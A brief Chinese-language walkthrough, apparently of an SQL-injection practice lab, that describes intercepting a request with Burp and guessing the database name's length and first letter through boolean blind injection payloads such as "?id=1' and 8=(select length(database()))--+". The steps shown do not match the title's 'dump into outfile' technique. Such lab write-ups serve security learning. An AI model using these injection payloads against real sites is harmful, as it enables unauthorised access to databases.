一、GET - Dump into outfile - String (导出文件GET字符型注入)
1.观察index.php中$sql
2.burp拦截
3..repeater一下
4.先猜一下数据库长度,如果正确就会显示you are in
?id=1' and 8= (select length(database()))--+
5,再猜首字母,正确就显示you are in。可以将26个字母不断对半分来猜。后面的以此类推
?id=1' and 's' = (select substr(database(),1,1)) --+
6,大功告成